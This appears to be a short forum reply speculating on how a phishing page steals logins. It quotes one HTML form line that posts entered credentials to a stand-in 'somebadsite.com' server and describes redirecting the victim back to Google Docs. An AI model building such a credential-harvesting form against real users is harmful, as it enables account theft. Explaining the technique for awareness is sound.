3 ms·
My guess would be: Using something like:<form action="somebadsite.com/script.php"> So the credentials entered get submitted to the form which is sent via POST
by eam 13y ago
My guess would be:
Using something like:<form action="somebadsite.com/script.php">
So the credentials entered get submitted to the form which is sent via POST request to an external server. From there they can do whatever they want with the credentials (perhaps save them to a db) then redirect back to google docs.